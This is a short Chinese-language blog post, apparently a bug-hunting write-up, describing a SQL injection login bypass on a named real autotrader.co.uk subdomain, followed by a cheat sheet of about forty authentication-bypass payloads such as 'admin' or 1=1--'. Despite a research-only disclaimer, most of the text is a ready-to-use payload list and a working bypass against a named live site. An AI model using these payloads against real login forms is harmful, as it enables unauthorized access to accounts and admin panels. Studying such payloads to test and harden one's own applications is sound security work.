使用SQL注入绕过身份验证
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
这里主要记录一下sqli一些笔记:
首先发现了一个子域:https://dealeremail.autotrader.co.uk/
, 有个登陆页面,如下:
用不同的用户名和密码多次登录,但都没有成功,在对 SQLi 进行测试后,在用户名字段中输入了 1”,并发生了类似下面这样的错误:
SELECT * FROM adm where the Error was Long and had the SQL Query that the login page function was using
在用户名和密码字段中使用了最常见的注入字符串,而后进入了管理员面板,使用字符串admin'-'
作为用户名,同样的admin'-'
也作为密码。
以上就是poc,但是添加了一些常见的一些字符串
最后分享一下SQLi认证绕过常用备忘单
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin” or “1”=”1″–
admin” or “1”=”1″#
admin” or “1”=”1″/*
admin”or 1=1 or “”=”
admin” or 1=1
admin” or 1=1–
admin” or 1=1#
admin” or 1=1/*
admin”) or (“1″=”1
admin”) or (“1″=”1”–
admin”) or (“1″=”1″#
admin”) or (“1″=”1″/*
admin”) or “1”=”1
admin”) or “1”=”1″–
admin”) or “1”=”1″#
admin”) or “1”=”1″/*
admin’ —
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1′–
admin’ or ‘1’=’1’#
admin’ or ‘1’=’1’/*
admin’or 1=1 or ”=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1’–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1′–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*